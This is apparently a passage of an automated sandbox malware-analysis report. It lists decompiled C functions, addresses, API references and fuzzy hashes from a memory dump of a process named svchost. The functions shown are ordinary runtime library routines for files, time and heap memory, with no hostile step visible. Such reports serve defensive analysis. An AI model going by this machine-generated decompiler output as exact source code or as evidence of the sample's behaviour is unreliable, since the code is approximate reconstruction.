                            • Instruction Fuzzy Hash: F731D97190020CBADB217BA49C86FAE3BE8DF12735F200299F9686B1D1DBB05D019665
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC13D0, Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                            Download Yara Rule
                            C-Code - Quality: 63%
                            			E00BC13D0(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				void* _v8;
				char _v92;
				void* _v100;
				char _v104;
				signed int _t12;
				signed int _t14;
				void* _t17;
				void* _t21;
				intOrPtr* _t31;
				char* _t35;
				signed int _t42;
				void* _t43;

				_t42 =  &_v100;
				_t12 =  *0xbec008; // 0xdc55bb75
				_v4 = _t12 ^ _t42;
				_t31 = _a4;
				_t35 =  &_v92;
				_t21 = _a8 + 0xffffffa0;
				_t14 = E00BC9F16(__edx,  *_t31, _t21, 0); // executed
				_t43 = _t42 + 0xc;
				if(_t14 != 0) {
					L5:
					E00BC786A();
					return _t14 | 0xffffffff;
				} else {
					_t14 = E00BC9B2B( &_v100, 0x60, 1,  *_t31); // executed
					_t43 = _t43 + 0x10;
					if(_t14 < 1) {
						goto L5;
					} else {
						while(1) {
							_t17 = E00BC9780(0xbe0340, _t35, 8);
							_t43 = _t43 + 0xc;
							if(_t17 == 0) {
								break;
							}
							_t35 = _t35 - 1;
							_t14 =  &_v100;
							if(_t35 >= _t14) {
								continue;
							} else {
								goto L5;
							}
							goto L7;
						}
						asm("movups xmm0, [esi]");
						asm("movups [edi+0x10], xmm0");
						asm("movups xmm0, [esi+0x10]");
						asm("movups [edi+0x20], xmm0");
						asm("movups xmm0, [esi+0x20]");
						asm("movups [edi+0x30], xmm0");
						asm("movups xmm0, [esi+0x30]");
						asm("movups [edi+0x40], xmm0");
						asm("movups xmm0, [esi+0x40]");
						asm("movups [edi+0x50], xmm0");
						asm("movq xmm0, [esi+0x50]");
						asm("movq [edi+0x60], xmm0");
						_push( *((intOrPtr*)(_t31 + 0x18)));
						L00BC7864();
						 *((intOrPtr*)(_t31 + 4)) = _t35 -  &_v104 + _t21 - _t17 + 0x58;
						E00BC786A();
						return 0;
					}
				}
				L7:
			}
















                            0x00bc13d0
                            0x00bc13d3
                            0x00bc13da
                            0x00bc13e5
                            0x00bc13e9
                            0x00bc13ef
                            0x00bc13f5
                            0x00bc13fa
                            0x00bc13ff
                            0x00bc143d
                            0x00bc1449
                            0x00bc1451
                            0x00bc1401
                            0x00bc140c
                            0x00bc1411
                            0x00bc1417
                            0x00000000
                            0x00bc1420
                            0x00bc1420
                            0x00bc1428
                            0x00bc142d
                            0x00bc1432
                            0x00000000
                            0x00000000
                            0x00bc1434
                            0x00bc1435
                            0x00bc143b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bc143b
                            0x00bc1452
                            0x00bc1455
                            0x00bc1459
                            0x00bc145d
                            0x00bc1461
                            0x00bc1465
                            0x00bc1469
                            0x00bc146d
                            0x00bc1471
                            0x00bc1475
                            0x00bc1479
                            0x00bc147e
                            0x00bc1483
                            0x00bc1486
                            0x00bc149e
                            0x00bc14a6
                            0x00bc14ae
                            0x00bc14ae
                            0x00bc1417
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __fread_nolockhtonl
                            • String ID:
                            • API String ID: 822407656-0
                            • Opcode ID: 97bbcec2b5d3a7bbfad269f17599036ca15f58a2a9f729a2676a345977fc263a
                            • Instruction ID: 1e82537b5a56d4b96169fa9a5473ff706fd661c50897dbb97d0780f7f272d75a
                            • Opcode Fuzzy Hash: 97bbcec2b5d3a7bbfad269f17599036ca15f58a2a9f729a2676a345977fc263a
                            • Instruction Fuzzy Hash: B121F232E04B41A7D2149B398C02BA6F3E0FFA8304F809B1DF99862642FB21F5D4C681
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD3587, Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E00BD3587(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xbf6368 + _a4 * 4;
				_t27 =  *0xbec008; // 0xdc55bb75
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xbec008; // 0xdc55bb75
							goto L13;
						}
						 *_t20 = E00BC9353(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00BD3623( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0xbec008; // 0xdc55bb75
						goto L7;
					}
					_t27 =  *0xbec008; // 0xdc55bb75
					goto L8;
				}
				L2:
				return _t33;
			}










                            0x00bd3592
                            0x00bd359b
                            0x00bd35a1
                            0x00bd35ab
                            0x00bd35ad
                            0x00bd35b1
                            0x00bd361c
                            0x00000000
                            0x00bd361c
                            0x00bd35b5
                            0x00bd35bb
                            0x00bd35c1
                            0x00bd35dd
                            0x00bd35dd
                            0x00bd35df
                            0x00bd35e1
                            0x00bd360c
                            0x00bd360e
                            0x00bd3616
                            0x00bd361a
                            0x00000000
                            0x00bd361a
                            0x00bd35ed
                            0x00bd35f1
                            0x00bd3606
                            0x00000000
                            0x00bd3606
                            0x00bd35fa
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd35c3
                            0x00bd35c3
                            0x00bd35c5
                            0x00bd35cd
                            0x00000000
                            0x00000000
                            0x00bd35cf
                            0x00bd35d5
                            0x00000000
                            0x00000000
                            0x00bd35d7
                            0x00000000
                            0x00bd35d7
                            0x00bd35fe
                            0x00000000
                            0x00bd35fe
                            0x00bd35b7
                            0x00000000

                            APIs
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00BD35E7
                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BD35F4
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: AddressProc__crt_fast_encode_pointer
                            • String ID:
                            • API String ID: 2279764990-0
                            • Opcode ID: b3c64d6df186e90c410f53bde9dc9d1b9e8794d10a7c4d690caf467480824bd0
                            • Instruction ID: f79a430bcbfbd2962356af433e8ec10280751cea912a06e02643e20ede41f5da
                            • Opcode Fuzzy Hash: b3c64d6df186e90c410f53bde9dc9d1b9e8794d10a7c4d690caf467480824bd0
                            • Instruction Fuzzy Hash: 86115C33A042249B9F21DF18EC8195AB7D1EB80B2471702A1FC1AAF346EF30DE4187D2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCE4A6, Relevance: 3.0, APIs: 2, Instructions: 50timeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 77%
                            			E00BCE4A6(void* __edx, FILETIME* _a4) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				struct _SYSTEMTIME _v40;
				signed int _t14;
				FILETIME* _t16;
				signed int _t17;
				void* _t26;
				void* _t30;
				void* _t32;
				signed int _t33;

				_t30 = __edx;
				_t14 =  *0xbec008; // 0xdc55bb75
				_v8 = _t14 ^ _t33;
				_t16 = _a4;
				if(_t16->dwLowDateTime != 0 || _t16->dwHighDateTime != 0) {
					_t16 = FileTimeToSystemTime(_t16,  &_v40);
					if(_t16 == 0) {
						goto L2;
					} else {
						_t16 = SystemTimeToTzSpecificLocalTime(0,  &_v40,  &_v24); // executed
						if(_t16 == 0) {
							goto L2;
						} else {
							_push(0xffffffff);
							_push(_v24.wSecond & 0x0000ffff);
							_t17 = E00BD56B5(_t26, _t30, _t32, _v24.wYear & 0x0000ffff, _v24.wMonth & 0x0000ffff, _v24.wDay & 0x0000ffff, _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff); // executed
						}
					}
				} else {
					L2:
					_t17 = _t16 | 0xffffffff;
				}
				E00BC786A();
				return _t17;
			}













                            0x00bce4a6
                            0x00bce4ae
                            0x00bce4b5
                            0x00bce4b8
                            0x00bce4be
                            0x00bce4d2
                            0x00bce4da
                            0x00000000
                            0x00bce4dc
                            0x00bce4e6
                            0x00bce4ee
                            0x00000000
                            0x00bce4f0
                            0x00bce4f4
                            0x00bce4f6
                            0x00bce510
                            0x00bce515
                            0x00bce4ee
                            0x00bce4c6
                            0x00bce4c6
                            0x00bce4c6
                            0x00bce4c9
                            0x00bce51d
                            0x00bce525

                            APIs
                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00BCE328,?), ref: 00BCE4D2
                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,00BCE328,?,?,?,?,00BCE328,?), ref: 00BCE4E6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Time$System$FileLocalSpecific
                            • String ID:
                            • API String ID: 1707611234-0
                            • Opcode ID: 249f17ce7ce2f285d0abf4875515e3aca084a0482fb92a7d14843a98d9475ebd
                            • Instruction ID: aafb46127e9a59cf7dc20b3706207cb7b52d016995556662ac36c35b8cf71e65
                            • Opcode Fuzzy Hash: 249f17ce7ce2f285d0abf4875515e3aca084a0482fb92a7d14843a98d9475ebd
                            • Instruction Fuzzy Hash: DD010561900119AACB24DBA58945FBEB7FCEF08721F504299B959E7180EA78DE80D770
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC9FC9, Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E00BC9FC9(signed int __edx, intOrPtr* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t64;
				signed int _t66;
				signed char _t68;
				signed int _t70;
				signed char _t77;
				intOrPtr* _t78;
				signed int _t79;
				signed char _t80;
				intOrPtr _t82;
				intOrPtr _t83;
				signed int _t90;
				intOrPtr _t93;
				signed int _t94;
				intOrPtr* _t95;
				signed char _t96;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t118;
				signed int _t120;

				_t104 = __edx;
				if(_a4 != 0) {
					_t64 = E00BD09C5(_a4);
					_t93 = _a4;
					_t118 = _t64;
					__eflags =  *(_t93 + 8);
					if( *(_t93 + 8) < 0) {
						 *(_t93 + 8) = 0;
					}
					_t66 = E00BD27EC(_t118, 0, 0, 1); // executed
					_t90 = _t104;
					_t109 = _t66;
					_v12 = _t109;
					__eflags = _t90;
					if(__eflags > 0) {
						L7:
						_t68 =  *(_a4 + 0xc);
						__eflags = _t68 & 0x000000c0;
						if((_t68 & 0x000000c0) != 0) {
							_t70 = _t118 >> 6;
							_t94 = (_t118 & 0x0000003f) * 0x30;
							_v16 = _t70;
							_v20 = _t94;
							_t95 = _a4;
							_v5 =  *((intOrPtr*)(_t94 +  *((intOrPtr*)(0xbf6108 + _t70 * 4)) + 0x29));
							_t96 =  *(_t95 + 0xc);
							asm("cdq");
							_t120 =  *_t95 -  *((intOrPtr*)(_t95 + 4));
							__eflags = _t96 & 0x00000003;
							if((_t96 & 0x00000003) == 0) {
								_t77 =  *(_a4 + 0xc) >> 2;
								__eflags = _t77 & 0x00000001;
								if((_t77 & 0x00000001) != 0) {
									L23:
									_t78 = _a4;
									L24:
									__eflags = _t109 | _t90;
									if((_t109 | _t90) == 0) {
										L30:
										_t79 = _t120;
										goto L31;
									}
									_t80 =  *(_t78 + 0xc);
									__eflags = _t80 & 0x00000001;
									if((_t80 & 0x00000001) == 0) {
										__eflags = _v5 - 1;
										if(_v5 == 1) {
											_t120 = E00BC7AE0(_t120, _t104, 2, 0);
										}
										_t120 = _t120 + _t109;
										asm("adc edx, ebx");
										goto L30;
									}
									_t79 = E00BCA15E(_a4, _t109, _t90, _t120, _t104);
									goto L31;
								}
								_t66 = E00BCC9CE();
								 *_t66 = 0x16;
								goto L22;
							}
							__eflags = _v5 - 1;
							_t99 = _v16;
							if(_v5 != 1) {
								L13:
								_t82 =  *((intOrPtr*)(0xbf6108 + _t99 * 4));
								_t100 = _v20;
								__eflags =  *(_t100 + _t82 + 0x28) & 0x00000080;
								if(( *(_t100 + _t82 + 0x28) & 0x00000080) == 0) {
									goto L23;
								}
								_t78 = _a4;
								_v20 = _v20 & 0x00000000;
								_t111 =  *(_t78 + 4);
								__eflags =  *_t78 - _t111;
								asm("sbb edi, edi");
								_t113 =  !_t111 &  *_t78 -  *(_t78 + 4);
								__eflags = _t113;
								_v16 = _t113;
								_t109 = _v12;
								if(_t113 == 0) {
									goto L24;
								}
								_t103 =  *(_t78 + 4);
								_t114 = _v20;
								do {
									__eflags =  *_t103 - 0xa;
									if( *_t103 == 0xa) {
										_t120 = _t120 + 1;
										asm("adc edx, 0x0");
									}
									_t103 = _t103 + 1;
									_t114 = _t114 + 1;
									__eflags = _t114 - _v16;
								} while (_t114 != _v16);
								_t109 = _v12;
								goto L24;
							}
							_t115 = _v20;
							_t83 =  *((intOrPtr*)(0xbf6108 + _t99 * 4));
							__eflags =  *(_t115 + _t83 + 0x2d) & 0x00000002;
							_t109 = _v12;
							if(( *(_t115 + _t83 + 0x2d) & 0x00000002) == 0) {
								goto L13;
							}
							_t79 = E00BCA2E2(_a4, _t109, _t90);
							goto L31;
						}
						asm("cdq");
						_t79 = _t109 -  *((intOrPtr*)(_a4 + 8));
						asm("sbb ebx, edx");
						goto L31;
					} else {
						if(__eflags < 0) {
							L22:
							_t79 = _t66 | 0xffffffff;
							L31:
							return _t79;
						}
						__eflags = _t109;
						if(_t109 < 0) {
							goto L22;
						}
						goto L7;
					}
				}
				 *((intOrPtr*)(E00BCC9CE())) = 0x16;
				return E00BD1788() | 0xffffffff;
			}
































                            0x00bc9fc9
                            0x00bc9fd5
                            0x00bc9ff5
                            0x00bc9ffb
                            0x00bc9ffe
                            0x00bca002
                            0x00bca005
                            0x00bca007
                            0x00bca007
                            0x00bca011
                            0x00bca016
                            0x00bca01b
                            0x00bca01d
                            0x00bca020
                            0x00bca022
                            0x00bca032
                            0x00bca035
                            0x00bca038
                            0x00bca03a
                            0x00bca055
                            0x00bca058
                            0x00bca05b
                            0x00bca065
                            0x00bca06c
                            0x00bca06f
                            0x00bca077
                            0x00bca07a
                            0x00bca07b
                            0x00bca07d
                            0x00bca080
                            0x00bca104
                            0x00bca107
                            0x00bca109
                            0x00bca11d
                            0x00bca11d
                            0x00bca120
                            0x00bca122
                            0x00bca124
                            0x00bca155
                            0x00bca155
                            0x00000000
                            0x00bca155
                            0x00bca126
                            0x00bca129
                            0x00bca12b
                            0x00bca13e
                            0x00bca142
                            0x00bca14f
                            0x00bca14f
                            0x00bca151
                            0x00bca153
                            0x00000000
                            0x00bca153
                            0x00bca134
                            0x00000000
                            0x00bca139
                            0x00bca10b
                            0x00bca110
                            0x00000000
                            0x00bca110
                            0x00bca082
                            0x00bca086
                            0x00bca089
                            0x00bca0b1
                            0x00bca0b1
                            0x00bca0b8
                            0x00bca0bb
                            0x00bca0c0
                            0x00000000
                            0x00000000
                            0x00bca0c2
                            0x00bca0c5
                            0x00bca0ce
                            0x00bca0d1
                            0x00bca0d3
                            0x00bca0d7
                            0x00bca0d7
                            0x00bca0d9
                            0x00bca0dc
                            0x00bca0df
                            0x00000000
                            0x00000000
                            0x00bca0e1
                            0x00bca0e4
                            0x00bca0e7
                            0x00bca0e7
                            0x00bca0ea
                            0x00bca0ec
                            0x00bca0ef
                            0x00bca0ef
                            0x00bca0f2
                            0x00bca0f3
                            0x00bca0f4
                            0x00bca0f4
                            0x00bca0f9
                            0x00000000
                            0x00bca0f9
                            0x00bca08b
                            0x00bca08e
                            0x00bca095
                            0x00bca09a
                            0x00bca09d
                            0x00000000
                            0x00000000
                            0x00bca0a4
                            0x00000000
                            0x00bca0a9
                            0x00bca042
                            0x00bca045
                            0x00bca047
                            0x00000000
                            0x00bca024
                            0x00bca024
                            0x00bca116
                            0x00bca116
                            0x00bca157
                            0x00000000
                            0x00bca159
                            0x00bca02a
                            0x00bca02c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bca02c
                            0x00bca022
                            0x00bc9fdc
                            0x00000000

                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0d1fc46791b9e3200a6fce7744e3afeebe35c6002caad1449ffb62de4669e78d
                            • Instruction ID: 06f90de71917399901a4da8fb41af17769d9c45d04c9d0061b4bc8f9ee6dd2e4
                            • Opcode Fuzzy Hash: 0d1fc46791b9e3200a6fce7744e3afeebe35c6002caad1449ffb62de4669e78d
                            • Instruction Fuzzy Hash: 2B51A331A00108AFDB10DF58CC45FA97BE1EB86368F1981DCE859AB392C731ED42CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD5E01, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E00BD5E01(void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t25;

				E00BD5BBD( &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 != 0) {
					_t25 = E00BDC048( &_v8, _a4, _v20, _a12, 0x180); // executed
					if(_t25 != 0) {
						goto L1;
					}
					 *0xbf5e8c =  *0xbf5e8c + 1;
					asm("lock or [eax], ecx");
					 *((intOrPtr*)(_a16 + 8)) = 0;
					 *((intOrPtr*)(_a16 + 0x1c)) = 0;
					 *((intOrPtr*)(_a16 + 4)) = 0;
					 *_a16 = 0;
					 *((intOrPtr*)(_a16 + 0x10)) = _v8;
					return _a16;
				}
				L1:
				return 0;
			}









                            0x00bd5e12
                            0x00bd5e1e
                            0x00bd5e1f
                            0x00bd5e20
                            0x00bd5e27
                            0x00bd5e3f
                            0x00bd5e49
                            0x00000000
                            0x00000000
                            0x00bd5e4e
                            0x00bd5e5a
                            0x00bd5e62
                            0x00bd5e68
                            0x00bd5e6e
                            0x00bd5e74
                            0x00bd5e7c
                            0x00000000
                            0x00bd5e7f
                            0x00bd5e29
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            • Opcode ID: 28979cc709d8941b9c4d28f71ba508f7fcaafc182ec92faab910ec3ddf5a8fc4
                            • Instruction ID: 4749c0ad2d4d7a32950f73a485365c86cc4aa61e214a628b243b54308546b5e9
                            • Opcode Fuzzy Hash: 28979cc709d8941b9c4d28f71ba508f7fcaafc182ec92faab910ec3ddf5a8fc4
                            • Instruction Fuzzy Hash: 0711187190410AAFCF15DF58E94199B7BF4EF49310F10449AF808AB311E671DA25CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC9813, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E00BC9813(void* __ecx, intOrPtr _a4) {
				signed int _t13;
				void* _t16;
				void* _t24;
				signed int _t25;
				signed int _t26;
				intOrPtr _t28;

				_t28 = _a4;
				if(_t28 == 0) {
					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
					return E00BD1788() | 0xffffffff;
				}
				_push(_t25);
				_t26 = _t25 | 0xffffffff;
				if(( *(_t28 + 0xc) >> 0x0000000d & 0x00000001) != 0) {
					_t13 = E00BCDA31(_t24, _t28); // executed
					_t26 = _t13; // executed
					E00BD1AED(_t28); // executed
					_t16 = E00BD1875(E00BD09C5(_t28)); // executed
					if(_t16 >= 0) {
						if( *(_t28 + 0x1c) != 0) {
							E00BD09EB( *(_t28 + 0x1c));
							 *(_t28 + 0x1c) =  *(_t28 + 0x1c) & 0x00000000;
						}
					} else {
						_t26 = _t26 | 0xffffffff;
					}
				}
				E00BD19EF(_t28);
				return _t26;
			}









                            0x00bc9819
                            0x00bc981e
                            0x00bc9825
                            0x00000000
                            0x00bc9830
                            0x00bc9838
                            0x00bc9839
                            0x00bc9841
                            0x00bc9844
                            0x00bc984a
                            0x00bc984c
                            0x00bc9858
                            0x00bc9862
                            0x00bc986d
                            0x00bc9872
                            0x00bc9877
                            0x00bc987b
                            0x00bc9864
                            0x00bc9864
                            0x00bc9864
                            0x00bc9862
                            0x00bc987d
                            0x00000000

                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 53c0432bc4066464975b7a767e5d6c557e3d0b8557d8d6721c8e5e377a26fd3c
                            • Instruction ID: 3ec6ac1e0fac62b92dd238b78566d40616af34fe1b7c88307c26b85daa2e9e91
                            • Opcode Fuzzy Hash: 53c0432bc4066464975b7a767e5d6c557e3d0b8557d8d6721c8e5e377a26fd3c
                            • Instruction Fuzzy Hash: F6F0283250261067EB21766DDC09F5B76D88F433B0F110B9EF565D33D2EB74D80286A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD0A25, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E00BD0A25(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00BCC9CE())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xbf655c, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00BD0397();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00BD8686(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                            0x00bd0a25
                            0x00bd0a2b
                            0x00bd0a31
                            0x00bd0a63
                            0x00bd0a68
                            0x00bd0a6e
                            0x00000000
                            0x00bd0a6e
                            0x00bd0a35
                            0x00bd0a37
                            0x00bd0a37
                            0x00bd0a4e
                            0x00bd0a57
                            0x00bd0a5f
                            0x00000000
                            0x00000000
                            0x00bd0a3f
                            0x00bd0a41
                            0x00000000
                            0x00000000
                            0x00bd0a44
                            0x00bd0a49
                            0x00bd0a4a
                            0x00bd0a4c
                            0x00000000
                            0x00000000
                            0x00bd0a4c
                            0x00000000

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BD80E5,00000000,?,00BD0C3C,?,00000008,?,00BD3E2E,?,?,?), ref: 00BD0A57
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: a94c0d1722b9ee60513cf81ff523a204f42eb135c3d025b757bb5d1c4aa48ab0
                            • Instruction ID: abbe7ee90eb8a613d90e803bd379c729d9b46f233e840c364db4ce40e913425b
                            • Opcode Fuzzy Hash: a94c0d1722b9ee60513cf81ff523a204f42eb135c3d025b757bb5d1c4aa48ab0
                            • Instruction Fuzzy Hash: 91E0E52212172196D621B665AC45B5AFAD8DF413B0F2511D3FC49A73C0FE60CD00C2A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD1AED, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E00BD1AED(intOrPtr* _a4) {
				signed char _t11;
				unsigned int* _t17;
				intOrPtr* _t18;

				_t18 = _a4;
				_t17 = _t18 + 0xc;
				_t11 =  *_t17 >> 0xd;
				if((_t11 & 0x00000001) != 0) {
					_t11 =  *_t17 >> 6;
					if((_t11 & 0x00000001) != 0) {
						E00BD09EB( *((intOrPtr*)(_t18 + 4))); // executed
						asm("lock and [edi], eax");
						 *((intOrPtr*)(_t18 + 4)) = 0;
						 *_t18 = 0;
						 *((intOrPtr*)(_t18 + 8)) = 0;
						return 0;
					}
				}
				return _t11;
			}






                            0x00bd1af3
                            0x00bd1af7
                            0x00bd1afc
                            0x00bd1b01
                            0x00bd1b05
                            0x00bd1b0a
                            0x00bd1b0f
                            0x00bd1b1a
                            0x00bd1b1f
                            0x00bd1b22
                            0x00bd1b24
                            0x00000000
                            0x00bd1b24
                            0x00bd1b0a
                            0x00bd1b2a

                            APIs
                            • _free.LIBCMT ref: 00BD1B0F
                              • Part of subcall function 00BD09EB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
